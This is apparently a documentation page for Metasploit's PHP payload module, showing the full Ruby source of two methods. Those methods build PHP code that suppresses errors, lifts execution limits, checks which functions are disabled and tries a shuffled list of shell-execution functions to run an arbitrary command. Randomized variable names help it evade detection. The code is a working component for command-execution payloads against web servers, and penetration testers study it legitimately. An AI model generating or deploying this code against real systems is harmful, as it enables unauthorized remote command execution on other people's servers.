Module: Msf::Payload::Php
- Included in:
- Exploit::PhpEXE, BindTcp
- Defined in:
- lib/msf/core/payload/php.rb
Defined Under Namespace
Modules: BindTcp, ReverseTcp, SendUUID
Instance Method Summary collapse
-
#php_preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
-
#php_system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
Instance Method Details
#php_preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
The generated code will initialize
19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
# File 'lib/msf/core/payload/php.rb', line 19 def php_preamble( = {}) dis = [:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) dis = '$' + dis if (dis[0,1] != '$') @dis = dis # Canonicalize the list of disabled functions to facilitate choosing a # system-like function later. preamble = "/*<?php /**/ @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0); #{dis}=@ini_get('disable_functions'); if(!empty(#{dis})){ #{dis}=preg_replace('/[, ]+/',',',#{dis}); #{dis}=explode(',',#{dis}); #{dis}=array_map('trim',#{dis}); }else{ #{dis}=array(); } " return preamble end |
#php_system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 |
# File 'lib/msf/core/payload/php.rb', line 55 def php_system_block( = {}) cmd = [:cmd_varname] || '$cmd' dis = [:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) output = [:output_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) if (@dis.nil?) @dis = dis end cmd = '$' + cmd if (cmd[0,1] != '$') dis = '$' + dis if (dis[0,1] != '$') output = '$' + output if (output[0,1] != '$') is_callable = '$' + Rex::Text.rand_text_alpha(rand(4) + 4) in_array = '$' + Rex::Text.rand_text_alpha(rand(4) + 4) setup = " if (FALSE!==stristr(PHP_OS,'win')){ #{cmd}=#{cmd}.\" 2>&1\\n\"; } #{is_callable}='is_callable'; #{in_array}='in_array'; " shell_exec = " if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){ #{output}=`#{cmd}`; }else" passthru = " if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){ ob_start(); passthru(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else" system = " if(#{is_callable}('system')&&!#{in_array}('system',#{dis})){ ob_start(); system(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else" exec = " if(#{is_callable}('exec')&&!#{in_array}('exec',#{dis})){ #{output}=array(); exec(#{cmd},#{output}); #{output}=join(chr(10),#{output}).chr(10); }else" proc_open = " if(#{is_callable}('proc_open')&&!#{in_array}('proc_open',#{dis})){ $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); #{output}=NULL; while(!feof($pipes[1])){ #{output}.=fread($pipes[1],1024); } @proc_close($handle); }else" popen = " if(#{is_callable}('popen')&&!#{in_array}('popen',#{dis})){ $fp=popen(#{cmd},'r'); #{output}=NULL; if(is_resource($fp)){ while(!feof($fp)){ #{output}.=fread($fp,1024); } } @pclose($fp); }else" # Currently unused until we can figure out how to get output with COM # objects (which are not subject to safe mode restrictions) instead of # PHP functions. #win32_com = " # if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { # $wscript = new COM('Wscript.Shell'); # $wscript->run(#{cmd} . ' > %TEMP%\\out.txt'); # #{output} = file_get_contents('%TEMP%\\out.txt'); # }else" fail_block = " { #{output}=0; } " exec_methods = [passthru, shell_exec, system, exec, proc_open, popen] exec_methods = exec_methods.shuffle buf = setup + exec_methods.join("") + fail_block return buf end |